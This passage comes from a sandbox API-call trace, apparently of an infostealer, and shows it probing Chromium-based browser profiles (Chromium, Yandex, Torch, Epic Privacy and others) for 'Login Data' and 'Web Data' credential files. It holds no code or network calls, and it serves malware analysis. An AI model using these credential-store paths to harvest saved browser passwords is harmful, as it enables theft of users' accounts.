param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 71 [0144.870] GetProcessHeap () returned 0x690000 [0144.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x92) returned 0x6ac298 [0144.870] GetProcessHeap () returned 0x690000 [0144.870] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.872] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 0 [0144.872] GetProcessHeap () returned 0x690000 [0144.872] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0144.872] GetProcessHeap () returned 0x690000 [0144.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0144.873] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.874] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 54 [0144.874] GetProcessHeap () returned 0x690000 [0144.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x70) returned 0x6ac278 [0144.874] GetProcessHeap () returned 0x690000 [0144.874] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.875] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 0 [0144.875] GetProcessHeap () returned 0x690000 [0144.876] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0144.876] GetProcessHeap () returned 0x690000 [0144.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0144.876] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.877] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 62 [0144.877] GetProcessHeap () returned 0x690000 [0144.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x80) returned 0x6ac288 [0144.877] GetProcessHeap () returned 0x690000 [0144.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.879] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 0 [0144.879] GetProcessHeap () returned 0x690000 [0144.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0144.879] GetProcessHeap () returned 0x690000 [0144.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0144.881] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.882] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 70 [0144.882] GetProcessHeap () returned 0x690000 [0144.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x90) returned 0x6ac2a0 [0144.882] GetProcessHeap () returned 0x690000 [0144.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.884] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 0 [0144.884] GetProcessHeap () returned 0x690000 [0144.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0144.904] GetProcessHeap () returned 0x690000 [0144.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0144.905] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.906] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 68 [0144.906] GetProcessHeap () returned 0x690000 [0144.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8c) returned 0x6ac298 [0144.906] GetProcessHeap () returned 0x690000 [0144.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.907] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 0 [0144.907] GetProcessHeap () returned 0x690000 [0144.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0144.908] GetProcessHeap () returned 0x690000 [0144.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0144.908] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.909] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 51 [0144.909] GetProcessHeap () returned 0x690000 [0144.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6a) returned 0x6ac278 [0144.909] GetProcessHeap () returned 0x690000 [0144.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.910] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.910] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 0 [0144.910] GetProcessHeap () returned 0x690000 [0144.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0144.911] GetProcessHeap () returned 0x690000 [0144.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0144.912] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.912] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 59 [0144.912] GetProcessHeap () returned 0x690000 [0144.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6ac288 [0144.913] GetProcessHeap () returned 0x690000 [0144.913] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.914] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 0 [0144.914] GetProcessHeap () returned 0x690000 [0144.915] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0144.915] GetProcessHeap () returned 0x690000 [0144.915] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0144.916] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.916] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 73 [0144.916] GetProcessHeap () returned 0x690000 [0144.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x96) returned 0x6ac2a0 [0144.916] GetProcessHeap () returned 0x690000 [0144.917] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.918] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 0 [0144.918] GetProcessHeap () returned 0x690000 [0144.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0144.919] GetProcessHeap () returned 0x690000 [0144.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0144.919] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.920] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 71 [0144.920] GetProcessHeap () returned 0x690000 [0144.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x92) returned 0x6ac298 [0144.920] GetProcessHeap () returned 0x690000 [0144.921] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.922] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 0 [0144.922] GetProcessHeap () returned 0x690000 [0144.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0144.923] GetProcessHeap () returned 0x690000 [0144.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0144.924] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.925] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 54 [0144.925] GetProcessHeap () returned 0x690000 [0144.925] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x70) returned 0x6ac278 [0144.925] GetProcessHeap () returned 0x690000 [0144.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.926] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 0 [0144.926] GetProcessHeap () returned 0x690000 [0144.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0144.927] GetProcessHeap () returned 0x690000 [0144.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0144.927] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.928] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 62 [0144.928] GetProcessHeap () returned 0x690000 [0144.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x80) returned 0x6ac288 [0144.928] GetProcessHeap () returned 0x690000 [0144.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.929] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.929] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 0 [0144.930] GetProcessHeap () returned 0x690000 [0144.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0144.930] GetProcessHeap () returned 0x690000 [0144.930] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0144.931] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.932] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 78 [0144.932] GetProcessHeap () returned 0x690000 [0144.932] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa0) returned 0x69a8f0 [0144.932] GetProcessHeap () returned 0x690000 [0144.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.933] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 0 [0144.933] GetProcessHeap () returned 0x690000 [0144.934] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69a8f0 | out: hHeap=0x690000) returned 1 [0144.934] GetProcessHeap () returned 0x690000 [0144.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0144.935] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.935] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 76 [0144.935] GetProcessHeap () returned 0x690000 [0144.935] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x9c) returned 0x69a458 [0144.935] GetProcessHeap () returned 0x690000 [0144.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.937] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 0 [0144.937] GetProcessHeap () returned 0x690000 [0144.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69a458 | out: hHeap=0x690000) returned 1 [0144.938] GetProcessHeap () returned 0x690000 [0144.938] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0144.938] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.942] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 59 [0144.942] GetProcessHeap () returned 0x690000 [0144.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6ac278 [0144.942] GetProcessHeap () returned 0x690000 [0144.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.943] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.943] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 0 [0144.944] GetProcessHeap () returned 0x690000 [0144.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0144.944] GetProcessHeap () returned 0x690000 [0144.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0144.945] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.946] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 67 [0144.946] GetProcessHeap () returned 0x690000 [0144.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8a) returned 0x6ac288 [0144.946] GetProcessHeap () returned 0x690000 [0144.946] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.947] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 0 [0144.948] GetProcessHeap () returned 0x690000 [0144.948] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0144.948] GetProcessHeap () returned 0x690000 [0144.948] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0144.949] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.950] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 70 [0144.950] GetProcessHeap () returned 0x690000 [0144.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x90) returned 0x6ac2a0 [0144.951] GetProcessHeap () returned 0x690000 [0144.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.952] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 0 [0144.952] GetProcessHeap () returned 0x690000 [0144.953] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0144.953] GetProcessHeap () returned 0x690000 [0144.953] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0144.954] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.955] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 68 [0144.955] GetProcessHeap () returned 0x690000 [0144.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8c) returned 0x6ac298 [0144.955] GetProcessHeap () returned 0x690000 [0144.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.957] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 0 [0144.957] GetProcessHeap () returned 0x690000 [0144.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0144.958] GetProcessHeap () returned 0x690000 [0144.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0144.958] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.959] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 51 [0144.959] GetProcessHeap () returned 0x690000 [0144.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6a) returned 0x6ac278 [0144.959] GetProcessHeap () returned 0x690000 [0144.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.961] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 0 [0144.961] GetProcessHeap () returned 0x690000 [0144.961] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0144.961] GetProcessHeap () returned 0x690000 [0144.962] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0144.962] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.963] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 59 [0144.963] GetProcessHeap () returned 0x690000 [0144.963] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6ac288 [0144.963] GetProcessHeap () returned 0x690000 [0144.964] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.964] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.965] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 0 [0144.965] GetProcessHeap () returned 0x690000 [0144.965] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0144.965] GetProcessHeap () returned 0x690000 [0144.965] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0144.966] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.967] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 85 [0144.967] GetProcessHeap () returned 0x690000 [0144.967] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xae) returned 0x6ac2a0 [0144.967] GetProcessHeap () returned 0x690000 [0144.967] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.969] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 0 [0144.969] GetProcessHeap () returned 0x690000 [0144.969] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0144.969] GetProcessHeap () returned 0x690000 [0144.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0144.971] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.971] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 83 [0144.971] GetProcessHeap () returned 0x690000 [0144.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xaa) returned 0x6ac298 [0144.972] GetProcessHeap () returned 0x690000 [0144.972] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.973] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 0 [0144.974] GetProcessHeap () returned 0x690000 [0144.974] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0144.974] GetProcessHeap () returned 0x690000 [0144.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0144.975] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.976] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 66 [0144.976] GetProcessHeap () returned 0x690000 [0144.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x88) returned 0x6ac278 [0144.976] GetProcessHeap () returned 0x690000 [0144.978] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.991] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 0 [0144.991] GetProcessHeap () returned 0x690000 [0144.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0144.992] GetProcessHeap () returned 0x690000 [0144.992] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0144.992] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.993] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 74 [0144.994] GetProcessHeap () returned 0x690000 [0144.994] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x98) returned 0x6ac288 [0144.994] GetProcessHeap () returned 0x690000 [0144.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.995] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 0 [0144.996] GetProcessHeap () returned 0x690000 [0144.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0144.996] GetProcessHeap () returned 0x690000 [0144.996] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0144.997] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.998] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 85 [0144.998] GetProcessHeap () returned 0x690000 [0144.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xae) returned 0x6ac2a0 [0144.998] GetProcessHeap () returned 0x690000 [0144.998] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.999] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 0 [0144.999] GetProcessHeap () returned 0x690000 [0145.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0145.000] GetProcessHeap () returned 0x690000 [0145.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.000] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.002] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 83 [0145.002] GetProcessHeap () returned 0x690000 [0145.002] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xaa) returned 0x6ac298 [0145.002] GetProcessHeap () returned 0x690000 [0145.002] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.003] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 0 [0145.003] GetProcessHeap () returned 0x690000 [0145.004] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0145.004] GetProcessHeap () returned 0x690000 [0145.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.005] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.005] wvsprintfW (in: 